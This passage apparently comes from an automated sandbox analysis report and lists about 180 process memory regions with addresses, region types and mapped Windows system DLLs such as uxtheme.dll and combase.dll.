pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 424 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 425 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 426 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 427 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 428 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 429 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 430 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 431 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 432 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 433 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 434 start_va = 0x1e0000 end_va = 0x1eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 435 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 436 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 437 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 438 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 439 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 440 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 441 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 442 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 443 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 444 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 445 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 446 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 447 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 448 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 449 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 450 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 451 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 452 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 453 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 454 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 455 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 456 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 457 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 458 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 459 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 460 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 461 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 462 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 463 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 464 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 465 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 466 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 467 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 468 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 469 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 470 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 471 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 472 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 473 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 474 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 475 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 476 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 477 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 478 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 479 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 480 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 481 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 482 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 483 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 484 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 485 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 486 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 487 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 488 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 489 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 490 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 491 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 492 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 493 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 494 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 495 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 496 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 497 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 498 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 499 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 500 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 501 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 502 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 503 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 504 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 505 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 506 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 507 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 508 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 509 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 510 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 511 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 512 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 513 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 514 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 515 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 516 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 517 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 518 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 519 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 520 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 521 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 522 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 523 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 524 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 525 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 526 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 527 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 528 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 529 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 530 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 531 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 532 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 533 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 534 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 535 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 536 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 537 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 538 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 539 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 540 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 541 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 542 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 543 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 544 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 545 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 546 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 547 start_va = 0x1e0000 end_va = 0x1eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 548 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 549 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 550 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 551 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 552 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 553 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 554 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 555 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 556 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 557 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 558 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 559 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 560 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 561 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 562 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 563 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 564 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 565 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 566 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 567 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 568 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 569 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 570 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 571 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 572 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 573 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 574 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 575 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 576 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 577 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 578 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 579 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 580 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 581 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 582 start_va = 0x1e0000 end_va = 0x1eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 583 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 584 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 585 start_va = 0x1c0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 586 start_va = 0x1e0000 end_va = 0x1eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 587 start_va = 0x1c0000 end_va = 0x1cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 588 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 589 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 590 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 591 start_va = 0xd0d0000 end_va = 0xd5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d0d0000" filename = "" Region: id = 592 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 593 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 594 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 595 start_va = 0xef0000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 596 start_va = 0xff0000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 597 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 598 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 599 start_va = 0x1040000 end_va = 0x10fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 600 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 601 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 602 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 603 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 604 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" 